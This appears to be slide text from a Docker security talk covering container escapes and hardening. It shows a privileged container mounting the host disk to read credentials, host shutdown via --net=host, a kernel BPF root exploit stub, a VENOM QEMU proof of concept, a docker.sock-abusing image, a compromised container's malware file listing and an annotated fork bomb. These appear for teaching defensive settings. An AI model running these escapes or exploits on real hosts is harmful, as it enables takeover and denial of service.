20. “It also allows the container to access local network
services + like D-bus and is therefore considered
insecure”
$ docker run --net=host -it ubuntu bash
root@ubuntu:/# shutdown now
root@ubuntu:/#
$ docker run --net=host -it ubuntu bash
Post http://docker:2345/v1.20/containers/create: EOF.
* Are you trying to connect to a TLS-enabled daemon without TLS?
* Is your docker daemon up and running?
22. $ docker run --privileged –d nginx
$ ./exploit
container> df –h
Filesystem Size Used Avail Use% Mounted on
overlay 19G 2.7G 15G 16% /
/dev/vda1 19G 2.7G 15G 16% /etc/hosts
shm 64M 0 64M 0% /dev/shm
container> mkdir -p /tmp2; mount /dev/vda1 /tmp2
container> ls /tmp2
container> cat /tmp2/root/.docker/config
23. Docker provides a lot out of the box
but not everything…
https://www.nccgroup.trust/globalassets/our-research/us/whitepapers/2016/april/ncc_group_understanding_hardening_linux_containers-1-1.pdf
27. $ whoami
root
$ fallocate 1000T /etc/hosts
$ whoami
non-root-user
$ fallocate 1000T /mydata
Use ZFS file system. Enables Disk space quotas on
a per container level.
30. Kernel (Ubuntu 16.04) BPF Exploit
int main(void) {
if (setuid(0) || setgid(0))
err(1, "setuid/setgid");
fputs("we have root privs now...n", stderr);
execl("/bin/bash", "bash", NULL);
err(1, "execl");
}
https://www.exploit-db.com/exploits/39772/
31.
32.
33.
34.
35. Restrictions
• Namespaces – What can I see
• Capabilities – What can I do?
• Cgroups – How much of something can I use?
• Seccomp – What can I call?
• AppArmor – What can my app do?
36. Cgroup Settings
• Limit a container to a share of the resource
> --cpu-shares
> --cpuset-cpus
> --memory-reservation
> --kernel-memory
> --blkio-weight (block IO)
> --device-read-iops
> --device-write-iops
38. Everything is a syscall
• In Linux all applications interact with Kernel
via System Calls
• strace outputs all the calls
• Limit what calls can or cannot be executed
62. C /bin
C /bin/netstat
C /bin/ps
C /bin/ss
C /etc
C /etc/init.d
A /etc/init.d/DbSecuritySpt
A /etc/init.d/selinux
C /etc/rc1.d
A /etc/rc1.d/S97DbSecuritySpt
A /etc/rc1.d/S99selinux
C /etc/rc2.d
A /etc/rc2.d/S97DbSecuritySpt
A /etc/rc2.d/S99selinux
C /etc/rc3.d
A /etc/rc3.d/S97DbSecuritySpt
A /etc/rc3.d/S99selinux
C /etc/rc4.d
A /etc/rc4.d/S97DbSecuritySpt
A /etc/rc4.d/S99selinux
C /etc/rc5.d
http://blog.benhall.me.uk/2015/09/what-happens-when-an-elasticsearch-container-is-hacked/
A /etc/rc5.d/S97DbSecuritySpt
A /etc/rc5.d/S99selinux
C /etc/ssh
A /etc/ssh/bfgffa
A /os6
A /safe64
C /tmp
A /tmp/.Mm2
A /tmp/64
A /tmp/6Sxx
A /tmp/6Ubb
A /tmp/DDos99
A /tmp/cmd.n
A /tmp/conf.n
A /tmp/ddos8
A /tmp/dp25
A /tmp/frcc
A /tmp/gates.lod
A /tmp/hkddos
A /tmp/hsperfdata_root
A /tmp/linux32
A /tmp/linux64
A /tmp/manager
A /tmp/moni.lod
A /tmp/nb
A /tmp/o32
A /tmp/oba
A /tmp/okml
A /tmp/oni
A /tmp/yn25
C /usr
C /usr/bin
A /usr/bin/.sshd
A /usr/bin/dpkgd
A /usr/bin/dpkgd/netstat
A /usr/bin/dpkgd/ps
A /usr/bin/dpkgd/ss
64. Read Only Containers
> docker run –-read-only
--security-opt=no-new-privileges
--security-opt="apparmor:es-profile”
–v /data:/data
elasticsearch
65.
66. Is Docker Secure?
• Yes. Docker is secure*
• Make sure you enable the security features
• ElasticSearch hack would have taken over
entire box
• But only as secure as your practices
67. $ docker run benhall/cute-kittens
Error: Missing docker.sock
Usage: docker run -v /var/run/docker.sock:/var/run/docker.sock
benhall/cute-kittens
$ docker run
-v /var/run/docker.sock:/var/run/docker.sock
benhall/cute-kittens
68. if [ -e /var/run/docker.sock ]; then
echo "**** Launching ****”
docker run --privileged busybox ls /dev
echo "**** Cute kittens ****"
else
echo "Error: Missing docker.sock”
fi
69. $ docker run
-v /var/run/docker.sock:/var/run/docker.sock
-p 80:80
vulnerable-application
81. Think VMs contain?
CVE-2016-3710: QEMU: out-of-bounds memory access issue
Venom QEMU/KVM – Attack via floppy driver
#include <sys/io.h>
#define FIFO 0x3f5
int main() {
int i;
iopl(3);
outb(0x0a,0x3f5); /* READ ID */
for (i=0;i<10000000;i++)
outb(0x42,0x3f5); /* push */
}
82.
83. Privileged containers are not Contained!
Docker.sock file is sensitive!
https://katacoda.com/courses/docker-security
Apply Seccomp, AppArmor, PidsLimit
They will save you when things go wrong
Remember, run Docker / Kubernetes Bench
IDS and Container Security tooling are still key
same problem as applications when they’ve been hacked…
Docker doesn’t support Kernel Virtualisation… hence information from host kernel is leaked
User namespaces in 1.9 removes net=host
https://github.com/dotcloud/docker/issues/6401
:(){ :|:& };:
\_/| |||| ||\- ... the function ':', initiating a chain-reaction: each ':' will start two more.
| | |||| |\- Definition ends now, to be able to run ...
| | |||| \- End of function-block
| | |||\- disown the functions (make them a background process), so that the children of a parent
| | ||| will not be killed when the parent gets auto-killed
| | ||\- ... another copy of the ':'-function, which has to be loaded into memory.
| | || So, ':|:' simply loads two copies of the function, whenever ':' is called
| | |\- ... and pipe its output to ...
| | \- Load a copy of the function ':' into memory ...
| \- Begin of function-definition
\- Define the function ':' without any parameters '()' as follows: